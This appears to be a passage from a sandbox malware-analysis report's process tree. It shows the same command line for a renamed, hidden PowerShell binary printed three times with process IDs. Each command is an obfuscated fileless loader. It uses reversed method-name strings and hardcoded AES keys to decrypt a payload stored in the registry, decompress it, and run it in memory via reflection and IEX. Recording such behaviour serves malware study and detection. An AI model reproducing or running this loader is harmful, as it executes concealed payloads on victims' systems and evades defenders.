$wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:5708

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:6572

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:6696

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5928).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:224

C:\Windows\$sxr-powershell.exe
